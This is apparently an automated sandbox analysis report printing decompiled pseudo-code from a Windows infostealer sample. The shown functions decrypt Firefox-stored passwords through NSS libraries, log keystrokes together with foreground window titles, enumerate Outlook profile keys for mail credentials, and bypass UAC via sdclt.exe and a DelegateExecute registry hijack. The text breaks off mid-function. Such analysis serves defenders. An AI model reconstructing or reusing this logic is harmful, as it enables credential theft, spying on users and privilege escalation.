										 *((intOrPtr*)(_t216 + 0x88)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
							E00405FEB(_v24);
							E00405FEB(_v28);
							E00405FEB(_v32);
							E00405FEB(_v36);
							E00405FEB(_v16);
							E00405FEB(_v20);
							E00405FEB(_v40);
							E00405FEB(_a4);
							return _t158;
						}
						E00403549( &_v20,  &_v8);
						E00405FEB(_v8);
						goto L9;
					}
				}
				E00403549( &_v16,  &_v8);
				E00405FEB(_v8);
				goto L5;
			}



















                                  0x0040ade3
                                  0x0040adfb
                                  0x0040adfd
                                  0x0040ae01
                                  0x0040ae11
                                  0x0040ae1a
                                  0x0040ae28
                                  0x0040ae34
                                  0x0040ae41
                                  0x0040ae4d
                                  0x0040ae5a
                                  0x0040ae66
                                  0x0040ae73
                                  0x0040ae7f
                                  0x0040ae8c
                                  0x0040ae98
                                  0x0040aea5
                                  0x0040aeb1
                                  0x0040aebe
                                  0x0040aeca
                                  0x0040aed7
                                  0x0040aede
                                  0x0040aedf
                                  0x0040aee2
                                  0x0040aee9
                                  0x0040af00
                                  0x0040af10
                                  0x00000000
                                  0x00000000
                                  0x0040af15
                                  0x0040af19
                                  0x0040af1e
                                  0x0040af25
                                  0x0040af28
                                  0x00000000
                                  0x0040af2a
                                  0x0040af40
                                  0x0040af40
                                  0x0040af47
                                  0x0040af5c
                                  0x0040af6c
                                  0x00000000
                                  0x00000000
                                  0x0040af71
                                  0x0040af74
                                  0x0040af79
                                  0x0040af82
                                  0x00000000
                                  0x00000000
                                  0x0040af9a
                                  0x0040afa8
                                  0x0040afb3
                                  0x0040afbe
                                  0x0040afc9
                                  0x0040afcf
                                  0x0040afd1
                                  0x0040afdd
                                  0x0040afef
                                  0x0040aff7
                                  0x0040affd
                                  0x0040afff
                                  0x0040b005
                                  0x0040b01b
                                  0x0040b02e
                                  0x0040b044
                                  0x0040b057
                                  0x0040b06a
                                  0x0040b07d
                                  0x0040b090
                                  0x0040b0a3
                                  0x0040b0ae
                                  0x0040b0bc
                                  0x0040b0c4
                                  0x0040b0c4
                                  0x0040afff
                                  0x0040aff7
                                  0x0040b0c8
                                  0x0040b0d0
                                  0x0040b0d8
                                  0x0040b0e0
                                  0x0040b0e8
                                  0x0040b0f0
                                  0x0040b0f8
                                  0x0040b100
                                  0x0040b10b
                                  0x0040b10b
                                  0x0040af8d
                                  0x0040af95
                                  0x00000000
                                  0x0040af95
                                  0x0040af28
                                  0x0040af33
                                  0x0040af3b
                                  0x00000000

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                  • LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                  • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                  • API String ID: 410702425-850564384
                                  • Opcode ID: 90bd920bbb0a6560635d9d5dfae8779ac1366cf738f4096b56dbd6cdce014c34
                                  • Instruction ID: adf04343739510be93e0c3051fa592f7aed2d6a863cdebd9eec2d50d860fb44a
                                  • Opcode Fuzzy Hash: 90bd920bbb0a6560635d9d5dfae8779ac1366cf738f4096b56dbd6cdce014c34
                                  • Instruction Fuzzy Hash: F3910C71A00609ABCB04EFA1DC92AEEBB79AF54304F10413FE515771E1DF38AA55CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408793, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277registrystringwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00408793(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E00401052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E00406099(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E00403411( &_v644, _t195, L"Unknow");
											} else {
												E00403549( &_v648, E004036F7( &_v636,  &_v564));
												E00405FEB(_v644);
											}
											E00408C13( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E00403549( &_v632,  &_v644);
											_t93 =  *0x42675c; // 0x0
											E0040357C( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x42675c; // 0x0
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E004013B3(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E0040373F(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E0040373F(_t208 + 0xc,  &_v628);
												_t152 = E00404A78( &_v612, __eflags);
												_t189 =  *0x42675c; // 0x0
												E00405044( *((intOrPtr*)(_t189 + 0xa50)), _t152);
												E00404A4E( &_v648);
												_t96 =  *0x42675c; // 0x0
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x42675c; // 0x0
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x42675c; // 0x0
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E0040335A( &_v648, E004036F7( &_v636, _t101 + 0x210));
													E00405FEB(_v644);
													_t101 =  *0x42675c; // 0x0
													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x42675c; // 0x0
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x8
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x42675c; // 0x0
													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
													_t119 =  *0x42675c; // 0x0
													_t121 = lstrlenW(_t204);
													_t122 =  *0x42675c; // 0x0
													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
													_t124 =  *0x42675c; // 0x0
													_t126 = E00403373( &_v632);
													_t128 =  *0x42675c; // 0x0
													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x42675c; // 0x0
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x42675c; // 0x0
													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x42675c; // 0x0
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x42675c; // 0x0
													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
													_t178 =  *0x42675c; // 0x0
												}
												_t58 = _t178 + 8; // 0x8
												_t109 = lstrlenW(E00408B2D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E00408B2D( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x42675c; // 0x0
												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
												_t113 =  *0x42675c; // 0x0
												CloseHandle( *(_t113 + 4));
											}
											E00405FEB(_v620);
											_v620 = _t198;
											E00405FEB(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				E00405FEB(_t201);
				return _t198;
			}



































































                                  0x004087a2
                                  0x004087af
                                  0x004087b3
                                  0x004087bb
                                  0x004087be
                                  0x004087c0
                                  0x004087c4
                                  0x004087c7
                                  0x00408af0
                                  0x00408af3
                                  0x00408afb
                                  0x00408afe
                                  0x00408b08
                                  0x00408b10
                                  0x00408b15
                                  0x004087cd
                                  0x004087cd
                                  0x004087d0
                                  0x00408ae6
                                  0x004087d6
                                  0x004087db
                                  0x004087f8
                                  0x00408806
                                  0x0040880c
                                  0x0040880f
                                  0x0040881e
                                  0x00408820
                                  0x00408824
                                  0x00408826
                                  0x0040882e
                                  0x0040883c
                                  0x00408842
                                  0x00408846
                                  0x0040884c
                                  0x00408853
                                  0x0040886a
                                  0x00408870
                                  0x00408872
                                  0x004088a0
                                  0x00408874
                                  0x00408887
                                  0x00408890
                                  0x00408890
                                  0x004088ac
                                  0x004088ba
                                  0x004088bf
                                  0x004088cc
                                  0x004088d1
                                  0x004088d6
                                  0x004088d8
                                  0x004088da
                                  0x004088dd
                                  0x004088e5
                                  0x004088f1
                                  0x004088f6
                                  0x00408902
                                  0x0040890a
                                  0x00408913
                                  0x0040891c
                                  0x00408921
                                  0x0040892e
                                  0x00408937
                                  0x0040893c
                                  0x0040893c
                                  0x00408941
                                  0x00408947
                                  0x00408953
                                  0x0040895c
                                  0x0040895e
                                  0x00408963
                                  0x0040899e
                                  0x004089a2
                                  0x004089a2
                                  0x004089a8
                                  0x004089ae
                                  0x004089b3
                                  0x00408965
                                  0x00408979
                                  0x00408984
                                  0x00408989
                                  0x0040898e
                                  0x00408992
                                  0x00408994
                                  0x00000000
                                  0x00408996
                                  0x00408996
                                  0x00408996
                                  0x00408994
                                  0x004089c8
                                  0x004089ce
                                  0x004089da
                                  0x004089dd
                                  0x004089e3
                                  0x004089ea
                                  0x004089ed
                                  0x004089f4
                                  0x004089fb
                                  0x00408a04
                                  0x00408a06
                                  0x00408a11
                                  0x00408a18
                                  0x00408a21
                                  0x00408a23
                                  0x00408a35
                                  0x00408a3d
                                  0x00408a46
                                  0x00408a48
                                  0x00408a4d
                                  0x00408a58
                                  0x00408a5f
                                  0x00408a68
                                  0x00408a6a
                                  0x00408a70
                                  0x00408a70
                                  0x00408a75
                                  0x00408a7c
                                  0x00408a85
                                  0x00408a87
                                  0x00408a87
                                  0x00408a91
                                  0x00408aa8
                                  0x00408aa8
                                  0x00408aab
                                  0x00408ab1
                                  0x00408ab9
                                  0x00408abb
                                  0x00408ac3
                                  0x00408ac3
                                  0x00408acd
                                  0x00408ad6
                                  0x00408ada
                                  0x00408adf
                                  0x00408adf
                                  0x00408853
                                  0x00408846
                                  0x00408826
                                  0x004087dd
                                  0x004087ef
                                  0x004087ef
                                  0x004087db
                                  0x004087d0
                                  0x00408b1d
                                  0x00408b2a

                                  APIs
                                  • DefWindowProcA.USER32(?,?,?,?), ref: 004087E9
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00408806
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040883C
                                  • GetForegroundWindow.USER32 ref: 00408859
                                  • GetWindowTextW.USER32 ref: 0040886A
                                  • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00408953
                                  • PostQuitMessage.USER32 ref: 00408AE6
                                  • RegisterRawInputDevices.USER32 ref: 00408B15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                  • String ID: Unknow
                                  • API String ID: 3853268301-1240069140
                                  • Opcode ID: 1c18732a75042ba1516d45dd31a5679db3b9db88792648d788053113c3b00f7a
                                  • Instruction ID: 458c7b85aa02a6c7404881c9d8865e4587a04225f5986bfff7961e81c5bb117e
                                  • Opcode Fuzzy Hash: 1c18732a75042ba1516d45dd31a5679db3b9db88792648d788053113c3b00f7a
                                  • Instruction Fuzzy Hash: BEA18E71204200AFC710EF65DC89EAB7BB8EF84344F44857EF985A72A1DB35D905CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040983D, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0040983D(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E004011C0(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E00401052( &_v4116, 0, 0x800);
				E00401052( &_v8212, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					if(__eflags != 0) {
						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E004099FF(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}















                                  0x0040983d
                                  0x0040983d
                                  0x00409845
                                  0x00409852
                                  0x00409856
                                  0x00409860
                                  0x00409871
                                  0x00409898
                                  0x004098b3
                                  0x004098b5
                                  0x004098d0
                                  0x004098d2
                                  0x004098e1
                                  0x004098ee
                                  0x004098f0
                                  0x004099f8
                                  0x004099f8
                                  0x00000000
                                  0x004099f8
                                  0x004098f6
                                  0x004098f7
                                  0x00409904
                                  0x00409922
                                  0x00000000
                                  0x00000000
                                  0x0040992b
                                  0x004099f3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409931
                                  0x00409931
                                  0x00409933
                                  0x00409955
                                  0x00000000
                                  0x00000000
                                  0x0040995e
                                  0x00409972
                                  0x00409980
                                  0x00409994
                                  0x004099b1
                                  0x004099b3
                                  0x004099b5
                                  0x00000000
                                  0x00000000
                                  0x004099b7
                                  0x004099bb
                                  0x004099be
                                  0x004099c6
                                  0x004099e7
                                  0x00000000
                                  0x00000000
                                  0x004099e9
                                  0x004099ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004099ed
                                  0x00000000
                                  0x00409931
                                  0x004098d4
                                  0x00000000
                                  0x004098d4
                                  0x004098b7
                                  0x00000000
                                  0x004098b7
                                  0x0040989a
                                  0x00000000

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00409894
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 004098B1
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00409904
                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040991A
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040994D
                                  • RegCloseKey.ADVAPI32(?), ref: 0040995E
                                  • lstrcpyW.KERNEL32(?,?), ref: 00409972
                                  • lstrcatW.KERNEL32 ref: 00409980
                                  • lstrcatW.KERNEL32 ref: 00409994
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099B1
                                  • RegCloseKey.ADVAPI32(?,?), ref: 004099C6
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099E3
                                  Strings
                                  • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098E1, 004098E6, 004098F6
                                  • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040988A
                                  • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040989A
                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098C4, 004098D4
                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098A7, 004098B7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                  • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                  • API String ID: 1891545080-2020977430
                                  • Opcode ID: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction ID: b767e8cf4ef787b214c4ffa932510dbda8161c68e187407f9f6ec9346f9c833f
                                  • Opcode Fuzzy Hash: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction Fuzzy Hash: E1411EB290021DBEEB20DA91CC85EFB777CEF05384F1005BAB515F2151E6789E85ABA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041313A, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90sleepregistrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0041313A(void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				char _v1616;
				short* _t53;

				if(E0041111B() != 1) {
					CloseHandle( *0x559cb0);
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					if(_v8 != 0) {
						_t47 =  &_v12;
						E00410CFF( &_v12);
					}
					E00412E91();
					E00401052( &_v1616, 0, 0x400);
					GetModuleFileNameA(0,  &_v1616, 0x400);
					E00412E2C(_t47, 0x418fe6,  &_v1616);
					E00412E2C(_t47, "DelegateExecute", 0x418fe6);
					GetSystemDirectoryW( &_v592, 0x104);
					lstrcatW( &_v592, L"\\sdclt.exe");
					_t53 = L"open";
					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
					asm("movaps xmm0, [0x41a900]");
					_v72.lpFile =  &_v592;
					_v72.cbSize = 0x3c;
					_v72.fMask = 0x40;
					_v72.hwnd = 0;
					_v72.lpVerb = _t53;
					asm("movups [ebp-0x30], xmm0");
					ShellExecuteExW( &_v72);
					TerminateProcess(_v72.hProcess, 0);
					if(_v8 != 0) {
						E00410CD8( &_v12);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				return 0;
			}









                                  0x0041314d
                                  0x00413159
                                  0x00413165
                                  0x0041316f
                                  0x00413178
                                  0x0041317a
                                  0x0041317d
                                  0x0041317d
                                  0x00413182
                                  0x00413195
                                  0x004131a6
                                  0x004131b9
                                  0x004131c4
                                  0x004131d8
                                  0x004131ea
                                  0x004131fa
                                  0x00413202
                                  0x00413208
                                  0x00413215
                                  0x0041321c
                                  0x00413223
                                  0x0041322a
                                  0x0041322d
                                  0x00413230
                                  0x00413234
                                  0x0041323e
                                  0x00413247
                                  0x0041324c
                                  0x0041324c
                                  0x00413256
                                  0x00413266
                                  0x0041326d
                                  0x0041326d
                                  0x00413278

                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00413159
                                  • GetCurrentProcess.KERNEL32(?), ref: 00413168
                                  • IsWow64Process.KERNEL32(00000000), ref: 0041316F
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 004131A6
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004131D8
                                  • lstrcatW.KERNEL32 ref: 004131EA
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413202
                                  • ShellExecuteExW.SHELL32(?), ref: 00413234
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041323E
                                  • Sleep.KERNEL32(000007D0), ref: 00413256
                                  • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00413266
                                  • ExitProcess.KERNEL32 ref: 0041326D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseCurrentExecuteHandleShellToken$DeleteDirectoryExitFileInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                  • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                  • API String ID: 3164795406-2081737068
                                  • Opcode ID: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction ID: 1975b8516974a034e8a1e4695efa9b733e37ae44b87f84d9a85a70a28b88c4fa
                                  • Opcode Fuzzy Hash: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction Fuzzy Hash: 5931AE71C42118BBCB10AFA0DC48EDEBB7CEF44315F1040AAF909E2250D7785A95CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407F94, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135windowstringfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00407F94(void* __edx, void* __eflags) {
				short _v176;
				struct tagMSG _v204;
				void* _v208;
				struct _SYSTEMTIME _v228;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t40;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				void* _t59;
				struct HINSTANCE__* _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t90;

				_t90 = __eflags;
				_t71 = __edx;
				_t19 = GetModuleHandleA(0);
				_t62 =  *0x42675c; // 0x0
				_t60 = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00401052(_t62 + 0x210, 0, 0x800);
				_t22 =  *0x42675c; // 0x0
				E00401052(_t22 + 0x10, 0, 0x208);
				_t25 =  *0x42675c; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
				_t27 =  *0x42675c; // 0x0
				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v228);
